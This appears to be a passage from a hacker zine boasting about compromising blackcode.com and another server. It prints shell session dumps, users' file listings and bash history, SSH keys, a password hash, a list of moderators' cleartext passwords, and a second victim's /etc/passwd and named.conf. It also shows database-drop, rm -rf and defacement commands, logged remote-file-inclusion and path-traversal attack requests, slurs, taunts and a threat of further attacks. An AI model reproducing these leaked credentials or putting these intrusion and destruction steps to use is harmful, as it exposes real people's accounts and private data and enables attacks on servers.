3 2006 . drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. -rw------- 1 eweng eweng 105 Aug 20 2006 .bash_history -rw-r--r-- 1 eweng eweng 615 Aug 20 2006 .bashrc -rw-r--r-- 1 eweng eweng 615 Aug 20 2006 .profile drwxr-xr-x 3 eweng eweng 512 Sep 28 2006 For Iadnah drwx------ 37 eweng eweng 1024 Aug 20 2006 SiteUpload drwxr-xr-x 3 eweng eweng 512 Oct 1 2006 public_html $ ls -la public_html total 47396 drwxr-xr-x 3 eweng eweng 512 Oct 1 2006 . drwxr-xr-x 5 eweng eweng 512 Oct 3 2006 .. -rw-r--r-- 1 eweng eweng 6129797 Oct 1 2006 LV.rar -rw-r--r-- 1 eweng eweng 11438285 Oct 1 2006 PLV.rar -rw-r--r-- 1 eweng eweng 3255358 Oct 1 2006 S1LV.rar -rw-r--r-- 1 eweng eweng 2894417 Oct 1 2006 TLV.rar -rwxrwxrwx 1 eweng eweng 5227 Aug 20 2006 catch.php drwxr-xr-x 2 eweng eweng 512 Aug 20 2006 cgi-bin -rw-r--r-- 1 eweng eweng 34 Oct 1 2006 index.php -rwxrwxrwx 1 eweng eweng 1006 Aug 20 2006 proxy.php -rw-r--r-- 1 root eweng 30 Aug 20 2006 test.php -rwxrwxrwx 1 eweng eweng 398268 Aug 20 2006 xanon.txt $ cd wiki $ ls -la total 108068 drwxr-xr-x 5 wiki wiki 512 Feb 17 09:58 . drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. -rw------- 1 wiki wiki 4437 Jun 18 2007 .bash_history -rw------- 1 wiki wiki 389 Jun 18 2007 .mysql_history -rw-r--r-- 1 root wiki 5353996 Nov 21 00:46 db.sql drwxr-xr-x 2 wiki wiki 1024 Nov 11 2006 mediawiki-1.8.2 -rw-r--r-- 1 wiki wiki 3491471 Oct 13 2006 mediawiki-1.8.2.tar.gz drwxr-xr-x 16 root wiki 1024 Feb 17 09:59 old drwxr-xr-x 3 wiki wiki 512 Feb 17 10:00 public_html -rw-r--r-- 1 root wiki 46387200 Nov 21 00:47 public_html.tar $ cd vpopmail $ ls -la total 20964 drwxr-xr-x 11 vpopmail vchkpw 512 Jan 4 2007 . drwxr-xr-x 14 root daemon 512 Feb 26 16:40 .. -rw-r--r-- 1 root vchkpw 43 Aug 26 2006 .2782 -rw------- 1 vpopmail vchkpw 2560 Jan 4 2007 .bash_history drwx------ 2 vpopmail vchkpw 512 Aug 28 2006 .gnupg -rw------- 1 vpopmail vchkpw 1222 Jan 4 2007 .mysql_history drwx------ 2 vpopmail vchkpw 512 Jul 13 2007 .spamassassin -rw------- 1 vpopmail vchkpw 4 Sep 4 2006 asshat.log ## echo iadnah >> asshat.log -rw-r--r-- 1 vpopmail vchkpw 0 Jan 4 2007 badhosts drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 bin drwxr-xr-x 4 vpopmail vchkpw 512 Aug 26 2006 doc drwx------ 3 vpopmail vchkpw 512 Aug 26 2006 domains drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 etc -rw-r--r-- 1 root vchkpw 302 Jan 4 2007 hourly.php -rw------- 1 vpopmail vchkpw 45507 Sep 5 2006 iadnah.log drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 include drwxr-xr-x 2 vpopmail vchkpw 512 Aug 26 2006 lib -rwxr-xr-x 1 vpopmail vchkpw 83 Sep 4 2006 log.sh drwxr-xr-x 5 vpopmail vchkpw 512 Sep 3 2006 public_html -rwxr-xr-x 1 root vchkpw 3413 Aug 27 2006 qtrap-2.0.0 -rwxr-x--- 1 vpopmail vchkpw 1059 Sep 3 2006 scantest.sh -rw-r--r-- 1 vpopmail vchkpw 2661535 Sep 3 2006 senderlog.log -rwxr-x--- 1 root vchkpw 2874 Aug 27 2006 spamscan.php -rwxr-xr-x 1 vpopmail vchkpw 1408 Jan 4 2007 test.php -rwxr-x--- 1 vpopmail vchkpw 129 Sep 4 2006 test.sh -rw------- 1 vpopmail vchkpw 7914224 Jan 13 2007 vars -rw-r--r-- 1 vpopmail vchkpw 67 Aug 22 2006 vqadmin.passwd $ cat vqadmin.passwd admin:$2a$06$ovAh75s8sGRlHF/PnuPyRuQaSMDEPyU78.oogkZILoPai9ft.nbcG $ cd /home $ ls -la total 56 drwxr-xr-x 14 root wheel 512 Feb 26 10:16 . drwxr-xr-x 23 root wheel 1024 Apr 7 12:17 .. drwxr-xr-x 3 iadnah iadnah 512 Aug 20 2007 backup lrwxr-xr-x 1 root wheel 17 Nov 7 2006 bc -> /var/www/users/bc lrwxr-xr-x 1 root wheel 20 Nov 7 2006 bcbot -> /var/www/users/bcbot drwxr-xr-x 21 bridge bridge 1024 Feb 17 10:05 bridge lrwxr-xr-x 1 root wheel 25 Jan 24 20:25 darkmalice -> /var/www/users/darkmalice drwxr-xr-x 6 devel devel 512 Dec 18 20:03 dev lrwxr-xr-x 1 root wheel 21 Feb 26 10:14 eweng -> /var/www/users/eweng/ lrwxr-xr-x 1 root wheel 27 Feb 26 10:14 harrybotter -> /var/www/users/harrybotter/ drwxr-xr-x 16 iadnah iadnah 1536 Apr 4 09:02 iadnah drwxr-xr-x 6 lloth lloth 512 Feb 12 08:33 lloth drwxr-xr-x 4 logger logger 512 Nov 27 2006 logger lrwxr-xr-x 1 root wheel 22 Feb 26 10:15 mdfive -> /var/www/users/mdfive/ drwxr-xr-x 6 myrmidon666 myrmidon666 512 Feb 7 13:39 myrmidon666 drwxr-xr-x 2 origin origin 512 Jan 26 16:26 origin lrwxr-xr-x 1 root wheel 19 Nov 7 2006 phox -> /var/www/users/phox drwxr-xr-x 2 qscand qscand 512 Oct 11 2006 qscand drwxr-xr-x 8 silcbot silcbot 512 Aug 20 2007 silcbot lrwxr-xr-x 1 root wheel 15 Feb 26 10:16 users -> /var/www/users/ lrwxr-xr-x 1 root wheel 23 Nov 7 2006 vpopmail -> /var/www/users/vpopmail drwxr-xr-x 6 wiki wiki 512 Oct 24 2006 wiki drwxr-xr-x 2 x x 512 Aug 7 2006 x $ ls -la backup total 7414380 drwxr-xr-x 3 iadnah iadnah 512 Aug 20 2007 . drwxr-xr-x 14 root wheel 512 Feb 26 10:16 .. drwxr-xr-x 9 iadnah iadnah 512 Aug 16 2007 bc -rw-r--r-- 1 iadnah iadnah 1071779840 Aug 17 2007 bc.tar -rw-r--r-- 1 iadnah iadnah 9195520 Aug 17 2007 etc.tar -rw-r--r-- 1 iadnah iadnah 965959680 Aug 17 2007 home.tar -rw-r--r-- 1 iadnah iadnah 1308293120 Aug 17 2007 iadnah.tar -rw-r--r-- 1 iadnah iadnah 11223040 Aug 17 2007 log.tar -rw-r--r-- 1 iadnah iadnah 5068800 Aug 17 2007 silc.tar -rw-r--r-- 1 iadnah iadnah 360314880 Aug 17 2007 sql.tar -rw-r--r-- 1 iadnah iadnah 14028800 Aug 17 2007 wiki.tar -rw-r--r-- 1 iadnah iadnah 49141760 Aug 17 2007 wiki2.tar $ ls -la iadnah total 933148 drwxr-xr-x 16 iadnah iadnah 1536 Apr 4 09:02 . drwxr-xr-x 14 root wheel 512 Feb 26 10:16 .. drwx------ 3 iadnah iadnah 512 Oct 11 2006 .BitchX -rw-r--r-- 1 iadnah iadnah 0 Oct 6 2006 .addressbook -rw------- 1 iadnah iadnah 2285 Oct 6 2006 .addressbook.lu -rw------- 1 iadnah iadnah 7013 Apr 7 02:07 .bash_history -rw-r--r-- 1 iadnah iadnah 616 Aug 2 2006 .bashrc drwxr-xr-x 2 iadnah iadnah 512 Aug 19 2007 .bin drwxr-xr-x 2 iadnah iadnah 512 Aug 19 2007 .log -rw-r--r-- 1 iadnah iadnah 317 Mar 2 2006 .login -rw-r--r-- 1 iadnah iadnah 105 Mar 2 2006 .mailrc -rw------- 1 iadnah iadnah 3135 Dec 11 20:38 .mysql_history -rw------- 1 iadnah iadnah 17542 Nov 6 2006 .pine-debug1 -rw------- 1 iadnah iadnah 17499 Nov 6 2006 .pine-debug2 -rw------- 1 iadnah iadnah 17217 Nov 6 2006 .pinerc drwxr-xr-x 2 iadnah iadnah 512 May 30 2007 .ssh drwxr-xr-x 3 iadnah iadnah 512 Dec 19 21:52 .subversion -rw-r--r-- 1 iadnah iadnah 262144 Aug 25 2007 404.log -rw-r--r-- 1 iadnah iadnah 2916352 Apr 4 07:54 Maya8.5.iso drwx------ 37 iadnah iadnah 1024 Jun 3 2007 SiteUpload -rw-r--r-- 1 iadnah iadnah 526749 Aug 20 2007 acct.gz -rw-r--r-- 1 iadnah iadnah 1356 Mar 25 21:22 arab.txt -rw-r--r-- 1 iadnah iadnah 3332 Mar 26 17:39 attacker -rw-r--r-- 1 iadnah iadnah 3491 Sep 3 2006 bc.png -rw-r--r-- 1 iadnah iadnah 11489 Aug 12 2006 bc_bot.sql -rw-r--r-- 1 iadnah iadnah 131 Sep 17 2007 biotraineeship.txt -rw-r--r-- 1 iadnah iadnah 254 Oct 19 2007 crypt.php -rw-r--r-- 1 iadnah wheel 1756972 Mar 25 20:33 etterlog.pcap -rw-r--r-- 1 iadnah iadnah 967 Mar 26 17:26 fuckers -rw-r--r-- 1 iadnah iadnah 8569 Sep 19 2007 harry_botter.pl drwxr-xr-x 2 iadnah iadnah 512 Dec 12 00:02 hb-ng -rw-r--r-- 1 iadnah iadnah 1042 Feb 24 18:53 iadnah@iadnah.ath.cx -rwxr-xr-x 1 iadnah iadnah 401 Feb 5 20:06 id_rsa.pub -rw-r--r-- 1 iadnah iadnah 391683 May 30 2007 img.tar.gz ##ewwww his moms nudes -rw-r--r-- 1 iadnah iadnah 12905 Aug 12 2006 info -rw-r--r-- 1 iadnah users 105000960 Sep 28 2006 intel.tar -rw-r--r-- 1 iadnah iadnah 14940925 Jun 20 2007 ip -rw-r--r-- 1 iadnah iadnah 226968 Jun 20 2007 iplist -rwxr-xr-x 1 iadnah iadnah 5864 Aug 6 2006 jack.php -rw-r--r-- 1 iadnah iadnah 6507478 Jun 20 2007 jun.log.bz2 -rw-r--r-- 1 iadnah iadnah 940 Jun 20 2007 log.php -rw-r--r-- 1 root wheel 19306021 Aug 19 2007 log2.pcap.gz -rw-r--r-- 1 iadnah iadnah 1431 Sep 20 2006 lost drwx------ 2 iadnah iadnah 512 Nov 6 2006 mail -rw-r--r-- 1 iadnah iadnah 311838720 Feb 2 15:20 maya.tar -rw-r--r-- 1 iadnah iadnah 40022 May 30 2007 menuBkgd.jpg -rw-r----- 1 iadnah iadnah 2995 Apr 24 2007 named.conf -rwxr-xr-x 1 root iadnah 225 Aug 22 2006 netstat_parse.php drwxr-xr-x 10 iadnah iadnah 3072 Nov 29 15:42 nmap-4.20 drwxr-xr-x 2 iadnah iadnah 512 May 31 2007 pack -rw-r--r-- 1 iadnah iadnah 1801521 Mar 25 19:40 packetlog.dump -rw-r--r-- 1 root iadnah 400524 Nov 30 06:31 perl.log -rw-r--r-- 1 iadnah iadnah 3631433 Mar 26 17:12 pjirc.log drwxr-xr-x 4 iadnah iadnah 512 Jun 20 2007 public_html -rw-r--r-- 1 iadnah iadnah 1042 Dec 19 02:39 rkhunter-1.3.0_obsd.patch -rwxr-xr-x 1 iadnah iadnah 835 Aug 28 2006 sentral.php -rw-r--r-- 1 root iadnah 2058 Aug 22 2006 spam -rw-r--r-- 1 root iadnah 1529 Dec 7 2006 spammers drwxr-xr-x 15 iadnah iadnah 4096 Mar 6 2007 ssh drwxr-xr-x 2 iadnah iadnah 512 May 30 2007 stuff -rw-r--r-- 1 iadnah iadnah 6942720 May 30 2007 stuff.tar drwxr-xr-x 4 iadnah iadnah 512 Dec 19 22:10 test -rw-r--r-- 1 iadnah iadnah 35035 Aug 6 2006 test.html -rw-r--r-- 1 iadnah iadnah 37 Aug 30 2006 test.php -rw-r--r-- 1 iadnah iadnah 557056 Feb 28 19:01 thing.iso -rw-r--r-- 1 iadnah iadnah 1017 Sep 1 2006 top_bar.jpg -rw-r--r-- 1 iadnah iadnah 10597 Sep 1 2006 top_main.jpg $ cat fuckers ##if they are fuckers, what are we :0...and what are you? 0wned. www.blackcode.com - - [25/Mar/2008:22:01:17 -0400] "GET /pjirc//irc.php?phpEx=http://www.soscontacto.com.mx/rateme_v1.3.2/images/doc/ar ab.txt? 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HTTP/1.1" 404 - "-" "libwww-perl/5.808" www.blackcode.com - - [26/Mar/2008:16:56:32 -0400] "GET /pjirc/index.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 5863 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20080302 Firefox/" www.blackcode.com - - [26/Mar/2008:16:56:33 -0400] "GET /pjirc/index.php?phpEx=./../../../../../../etc/passwd HTTP/1.1" 200 5863 "-" "Mediapartners-Google" $ cat .ssh/* ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA8AKJYx7Rf1qdozVJvF9SjgfeDQb259Y9e6edMUanHdCWXSyaAls TBEaHdEdPSiILi9YXRna8oYLnuITTU2TB9sdglsGfO5Eqyi/5zAPGbtGGFJQWCcynWx0J9zEAEPkgEv x2X5EzuLRASwsoOAU4Ag9uSL0B5qRykUeaLfCphvM= iadnah@magus ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA3RLXUh+xSrAQdAz7MMs86nnWawYocxP+BJh4Tc2wkxr/k2I8YSB QT4F+rqG5/WbHNFIanrbQ9YFf+dArCgPeRJWsnQXmKKJHJDqYQKJfbORAgLc1wWPx1fEIn/8I2D2lnD wlpcfEmA927RSgYCXiq9owWACiNA/0ZbOwrnerCd0= iadnah@nowhere ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAs62oMrHkJDRGUBNYQB/R+Ns7VC59BtLPTG/huCx2r6VLbdYRdh0 epgc0Pakl8DwG0ttsoEH0bnov+WxwDyaC3fP71rqn57oFboHcnMQ3tmeQC/oB6RwT39ZMmsp7RdeRYs 8AfHQxquVMJjRB/mKNM5c3Fornhujbfo9pZMmCXHdl17JEu/mpFAShNe4wnzURT3u/wWtIMiB43qFlN p3kBKFMe3ZFMjmvsinyKQzYX1hzLZVdprLzWvSEbSnC56HUF5BAbTLy6gvFac9OM293wLOOuNDuGRLc Kv9dPjwSbaUHAFkNZhPdRVtf7Bo7VMkiilUPlUbU/UuRG8aAuzk27Q== root@acolyte uplinklounge.com, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxaCb8al7vXALpUL1nsqraIVb7vPu5SvMsEhAimAQLhk3HA4fGvL EqoGZkr8WamQtepcZ5unNYqiCZE76AE4kIshmlV4KQNrNxbdgeP5ZXoEOydqSFSKHOJXG556VV4j6t+ vP97By6SsUjmWrOdKFZkRri1+bYsofCupNSE04fX8= iadnah.ath.cx, ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApJcnHYhEWEcXfxjj4VjWtpi2kB9zVZYnLW9OoMqzNc7T6DSK0DB 9o2QCBwzo8+dLkVRg3YYEFDSlIAxMl4amITMXpPAqtgD99Kug7ImAaS9PwDHkgdHWZo7Q9ih/q9AeeO jsMpHBvK9GpIZ9MMSIknpoIk5VbqcYeH+oRZwvbMRwg9qep5Y2KYaEnhlWnTiuM6qOW6I7q0REcD9uG /bVwt+c7RKh30vFXe6NKQRadxzgGsDY9Lkx1+85UxAsEhjVHOCvHGRLZaFJe3wyuNvNFKETWTb5c0m0 C2poeKw14dTS8hHYHJ7X2Q7dCPkoY1UtK1oHntvL6tE+Hw2S/LwDmw== $ cat id_rsa.pub ssh-rsa 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grep mysql netstat -n | grep mysql ln -s /tmp/mysql.sock /var/run/mysql/mysql.sock exit cd cd silc cd silc ls exit ls rm silc.core screen silc exit ls ls logs/ ls logs tail logs/chatlog tail logs/userlog ls ls logs tail logs/nicklog cd .silc/ ls nano scripts/harry_botter.pl ls -lh screen -x screen -x screen -x exit pwd screen -r ls -l cd silcbot cd silcbot pwd ls -l cd . cd .. ls -l cd silcbot ls ls -h ls -help ls -help ls -g nano /home/silcbot/.silc/scripts/harry_botter.pl cd .silc/scripts/ ls mkdir ~/channels/uplinklounge mkdir -p ~/channels/uplinklounge mkdir -p ~/channels/blackcode nano harry_botter.pl cp harry_botter.pl harry_botter.pl.bak nano harry_botter.pl exit cd .silc/scripts/ ls ../friends/ ls nano harry_botter.pl ls ls ../ ls ../clientkeys/ ls ../ ls ../friends/ ls cd ls tail logs/nicklog tail logs/chatlog tail logs/chatlog tail logs/chatlog tail logs/chatlog clear ls cd .silc/scripts/ nano harry_botter.pl ps ax exit cd nano passwd exit cd .silc/scripts/ ls nano harry_botter.pl nano harry_botter.pl ls ls ../../ ls ../../channels/ ls ../../channels/blackcode/ ls ../../channels/uplinklounge/ nano harry_botter.pl ls cd ls mkdir users cd users/ ls nano iadnah cd nano .silc/scripts/harry_botter.pl nano .silc/scripts/harry_botter.pl nano ~/passwd nano .silc/scripts/harry_botter.pl nano ~/passwd nano .silc/scripts/harry_botter.pl exit screen -r screen silc screen exit cd .silc/scripts/ nano harry_botter.pl exit ls channels/ ls channels/blackcode/ ls cd screen -r exit nano .silc/scripts/harry_botter.pl ls ls logs/ tail logs/userlog nano .silc/scripts/harry_botter.pl ls channels/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ ls logs/userlog tail logs/userlog nano .silc/scripts/harry_botter.pl ls channels/ ls channels/blackcode/ ls channels/blackcode/ rm channels/*/* ls channels/ ls channels/blackcode/ ls channels/blackcode/iadnah ls channels/blackcode/ touch channels/*/harry_botter touch channels/blackcode/harry_botter touch channels/uplinklounge/harry_botter cd ls exit ls ls channels/ ls channels/blackcode/ rm channels/*/* ls ls ls channels/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ ls channels/blackcode/ screen -r exit ls cd ls nano silc_users.sh whereis bash nano silc_users.sh nano silc_users.sh chmod +x silc_users.sh ./silc_users.sh chmod +x silc_users.sh nano silc_users.sh ./silc_users.sh | sed -e "s/\n/,/g" ./silc_users.sh | sed -e "s/$/,/g" ./silc_users.sh | sed -e "s/\n$/,/g" ./silc_users.sh | sed -e "s/$/,/g" ./silc_users.sh nano silc_users.sh php silc_users.sh php silc_users.sh nano silc_users.sh php silc_users.sh php silc_users.sh php silc_users.sh nano silc_users.sh php silc_users.sh nano silc_users.sh php silc_users.sh nano silc_users.sh php silc nano silc_users.sh php silc_users.sh nano silc_users.sh php silc_users.sh php silc_users.sh php silc_users.sh php silc_users.sh nano silc_users.sh ls / ls -lh / exit cd users/ ls cd .. ls nano passwd ls -lh chmod 500 passwd ls -lh chmod 600 passwd ls -lh nano passwd screen 0r screen -r exit echo -n "7h0mp50n" | md5sum ## I must say, that is quite hilarious, even by your standards. echo -n "7h0mp50n" | md5 nano passwd cd .silc/ ls screen -r ls nano scripts/harry_botter.pl wc -l scripts/harry_botter.pl nano scripts/harry_botter.pl exit $ ls -la /home/lloth/ total 174808 drwxr-xr-x 3 lloth lloth 1024 Mar 2 22:53 . drwxr-xr-x 6 lloth lloth 512 Feb 12 08:33 .. -rw-r--r-- 1 lloth lloth 4967707 Feb 1 13:41 02 oxford comma.mp3 -rw-r--r-- 1 lloth lloth 64291622 Oct 18 2007 Basktblplayr-ButtonWoodsReturn793.mov -rw-r--r-- 1 lloth lloth 2513877 Apr 9 2007 Bodyrox ft. Luciana - Yeah Yeah.mp3 -rw-r--r-- 1 lloth lloth 4939904 Nov 2 09:29 Mindless Self Indulgence - Shut Me Up.mp3 -rw-r--r-- 1 lloth lloth 779392 Mar 20 2006 Owned.mp3 -rw-r--r-- 1 lloth lloth 3139675 Jun 6 2004 Pennywise - Fuck Authority.mp3 -rw-r--r-- 1 lloth lloth 222252 Oct 14 2004 a-bassy(BC-dis).mp3 -rw-r--r-- 1 lloth lloth 2063045 Feb 10 14:39 asdf.mp3 -rw-r--r-- 1 lloth lloth 1640906 Dec 1 2004 bc-dis.mp3 -rw-r--r-- 1 lloth lloth 685351 Nov 8 2004 bondLOOP2.mp3 drwxr-xr-x 2 lloth lloth 1024 Feb 25 01:52 forewen -rw-r--r-- 1 lloth lloth 2349 Aug 21 2007 index.html -rw-r--r-- 1 lloth lloth 5123 Aug 15 2007 md5eweng.txt -rw-r--r-- 1 lloth lloth 765181 Dec 1 2004 mylife.mp3 -rw-r--r-- 1 lloth lloth 234582 Oct 22 2004 servermurder.mp3 -rw-r--r-- 1 lloth lloth 5734 Feb 10 19:11 t.c -rw-r--r-- 1 lloth lloth 441822 Oct 5 1999 tm.ps -rw-r--r-- 1 lloth lloth 2403372 Oct 11 2007 wtf.mp3 -rw-r--r-- 1 lloth lloth 36158 Aug 17 2007 zf0investigate.htm ##h0ly c0w! what is diz ! -rw-r--r-- 1 lloth lloth 18370 Aug 20 2007 zf0logs.txt ##OH NO, THEY D3T3ct3d uS! ## INVESTIGATING US HUH $ head -n 10 zf0investigate.htm Hakspace.net - Social Networking For The Digitially Unhinged
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## oh WOW - saving googles of the whitedust expose, that's nice of ## you..something to show my grandkids for sure. $ head -n 10 zf0logs.txt Posted: Mon, 20 August 2007 06:10 access_log.1187222400:www.blackcode.com - - [20/Aug/2007:06:10:20 -0400] "POST /forum/index.php?t=post HTTP/1.1" 302 - "http://www.blackcode.com/forum/index.php?t=post&th_id=2128&reply_to=15347&rid= 0&start=0" "Mozilla/5.0 (X11 ; U; Linux x86_64; en-US; rv: Gecko/20061201 Firefox/ (Ubuntu-fei sty)" access_log.1187222400:www.blackcode.com - - [20/Aug/2007:06:10:34 -0400] "GET /forum/index.php?t=msg&goto=15464&rid=16216 HTTP/1.1" 200 31587 "http://www.blackcode.com/forum/index.php?t=post&th_id=2128&reply_to=15347&rid= 0&sta rt=0" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20061201 Fire fox/ (Ubuntu-feisty)" access_log.1187222400:www.blackcode.com - - [20/Aug/2007:06:10:47 -0400] "GET /forum/theme/Blackcode_New/images/msg_edit.gif HTTP/1.1" 200 1854 "http://www.blackcode.com/forum/index.php?t=msg&goto=15464&rid=16216" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20061201 Firefox/ (Ubunt u-feisty)" access_log.1187222400:www.blackcode.com - - [20/Aug/2007:06:10:47 -0400] "GET /forum/blank.gif HTTP/1.1" 200 43 "http://www.blackcode.com/forum/index.php?t=msg&goto=15464&rid=16216" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; r v: Gecko/20061201 Firefox/ (Ubuntu-feisty)" access_log.1187222400:www.blackcode.com - - [20/Aug/2007:06:31:06 -0 400] "GET /forum/index.php?t=ip&ip= HTTP/1.1" 200 5020 "https://www.blackcode.com/forum/index.php?t=msg&th=2128&start=0&rid=91" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20070219 Firefox/" ## mega lulz, you got us! posting on a forum thread (as milamber) wow! nothing escapes you guys ## Guess you guys didn't follow that investigation up? Didn't own our bounces? And finally the mods cleartexts: Lloth asdfghjkl;'1234567890 Mil U3wc2g9arARR ## HAHA if you check ZF03 his password was: U3wc1g9arARR, Eleet. Deadbob 3mm44ndj4ck L0g1c D1g1tal Origin qfj62a poetry this1k26 ChoHahn (*#ftg#*) myrmidon666 halo4256 ootini my3b1akblackcode We rm'd your site because you openly insulted us, that is not tolerated faggots. If we're going to send a message then we might as well do it right. Let this serve you a lesson. You don't want uplinklounge owned too right? $ mysql -u fud -p jdn52gj < drop $ rm -rf bc rm: bc/public_html/scripts/backups: Permission denied rm: bc/public_html/scripts: Directory not empty rm: bc/public_html: Directory not empty rm: bc: Permission denied $ id uid=1006(bc) gid=1005(bc) groups=1005(bc), 10(users), 1003(bcstaff) $ cd public_html $ ls scripts $ echo g00ns > index.html $ punt! No, g00ns didn't actually hack something notable, that would have been more shocking than this zine. ~ At around 3:04pm EST today blackcode.com was defaced. Someone claiming to be "crolox" from g00ns came into IRC and claimed responsibility, but we are not sure that g00ns had anything to do with this as of yet. We have some backups to restore from, but the forums and some parts of the download section may be lost. At this time we believe that the attacker(s) did not obtain a copy of our sql database, but if you happen to use the same password for blackcode as for anything else you may want to change it. We plan to have the site back online on a new server, and with updated forum software, as soon as possible. Please bear with us. In the meantime IRC is still available. ~Iadnah, May 8, 2008 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Trivia Security zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 We had this since zf03 but we thought it was a too shitty of an own to release. However their shitty banner poked my eyes for too long on a lot of h4x0r sites. It took us less than two minutes to get command execution on their shitty misconfigured server. Even though we placed forum logging for usernames and passwords the list is too shitty to release. We had to drop their databases and hope they'll never return because all that shittiness is just excessive. apache-3.00$ cat Settings.php apache-3.00$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin ltadmin:x:500:500::/home/ltadmin:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin apache:x:100:501::/var/www:/bin/false diradmin:x:101:101::/usr/local/directadmin:/bin/bash mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash webapps:x:501:502::/var/www/html:/bin/bash majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash admin:x:502:503::/home/admin:/bin/bash triviasec:x:503:504::/home/triviasec:/bin/bash tshostru:x:504:505::/home/tshostru:/bin/bash irad:x:505:506::/home/irad:/bin/false ddan:x:506:507::/home/ddan:/bin/bash cadnepal:x:507:508::/home/cadnepal:/bin/bash talk2w:x:508:509::/home/talk2w:/bin/false ehak:x:509:510::/home/ehak:/bin/false redeye:x:510:511::/home/redeye:/bin/false defusion:x:511:512::/home/defusion:/bin/bash madoresel:x:512:513::/home/madoresel:/bin/false wikis:x:513:514::/home/wikis:/bin/false spin:x:515:516::/home/spin:/bin/false niid:x:516:517::/home/niid:/bin/false nag:x:517:518::/home/nag:/bin/false nuthead:x:518:519::/home/nuthead:/bin/bash crypted:x:519:520::/home/crypted:/bin/false oziriz:x:520:521::/home/oziriz:/bin/false tsorg:x:521:522::/home/tsorg:/bin/bash groupt:x:523:524::/home/groupt:/bin/false bitsaa:x:524:525::/home/bitsaa:/bin/false cad:x:525:526::/home/cad:/bin/bash nepalj:x:526:527::/home/nepalj:/bin/bash apache-3.00$ cat /etc/named.conf # more shitty sites here // Default named.conf generated by install of bind-9.2.4-2 options { directory "/var/named"; dump-file "/var/named/data/cache_dump.db"; statistics-file "/var/named/data/named_stats.txt"; }; include "/etc/rndc.key"; zone "newinst.layeredtech.com" { type master; file "/var/named/newinst.layeredtech.com.db"; }; zone "triviasecurity.net" { type master; file "/var/named/triviasecurity.net.db"; }; zone "irad.com.np" { type master; file "/var/named/irad.com.np.db"; }; zone "dan.com.np" { type master; file "/var/named/dan.com.np.db"; }; zone "cad.com.np" { type master; file "/var/named/cad.com.np.db"; }; zone "talktoworlds.com" { type master; file "/var/named/talktoworlds.com.db"; }; zone "ethicalhackers.org" { type master; file "/var/named/ethicalhackers.org.db"; }; zone "redeye.triviasecurity.com.ru" { type master; file "/var/named/redeye.triviasecurity.com.ru.db"; }; zone "defusion.triviasecurity.com.ru" { type master; file "/var/named/defusion.triviasecurity.com.ru.db"; }; zone "triviasecurity.com.ru" { type master; file "/var/named/triviasecurity.com.ru.db"; }; zone "i-do-concrete.com" { type master; file "/var/named/i-do-concrete.com.db"; }; zone "wikisecure.net" { type master; file "/var/named/wikisecure.net.db"; }; 